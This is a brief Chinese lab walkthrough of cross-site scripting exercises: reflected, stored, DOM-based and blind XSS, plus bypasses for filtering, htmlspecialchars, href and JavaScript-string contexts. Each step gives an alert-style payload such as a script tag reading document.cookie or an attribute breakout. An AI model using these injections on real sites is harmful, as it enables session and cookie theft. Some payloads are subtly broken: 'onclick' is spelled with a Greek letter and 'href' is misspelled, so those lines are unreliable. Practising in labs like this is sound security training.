1.反射性xxs(get)
(1)首先输入“进行尝试
(2)输入js代码发现长度不够 使用f12修改字符长度
(3)输入js代码
2.反射性xxs(post)
(1)先用系统给的账号密码进行登录看看
(2)输入获取cookie的js语句
<script>alert(document.cookie)</script>
3.存储型xxs
(1)输入获取cookie的js语句
<script>alert(1)</script>
4.DOM型XSS
(1)输入js代码<script>alert(document.cookie)</script>
(2)查看源代码
(3)发现被包裹在a标签里面了,难怪不起作用,这稍微构造以下payload吧
#' οnclick="alert(1)">
5DOM型XSS-S
#' οnclick="alert(1)">
6xxs盲打
(1)输入<script>alert(1)</script>,1
发现页面没反应
(2)查看提示有后台登录地址,密码前面提过,登录会弹出框
7XSS之过滤
(1)<script>alert(1)</script>输个js语句看看
(2)f12查看页面源代码
(3)把URL中的payload部分字母变成大写
(4)发现错误,换个标签试试
<a herf="#" οnclick="alert(1)">
8.XSS之htmlspecialchars
(1)输入<script>alert(1)</script>
(2)f12查看页面源代码
(3)改造下语句
#' οnclick='alert(1)'>
9XSS之href输出
(1)输入<script>alert(1)</script>
(2)发现这里<
和>
被编码了,这样子哪怕是把a标签给闭合也不可能实现,那就只好使用函数了,因为JavaScript里面的a标签中的href属性是可以直接使用函数的。输入javascript:alert(1)
10.XSS之js输出
(1)输入<script>alert(1)</script>
(2)f12查看页面源代码
(3)发现我输入的payload到了script标签上来了,顺便还把script标签给闭合了,所以才会出现这一串乱七八糟的东西使用新的语句
';alert("cookie值是:"+1); //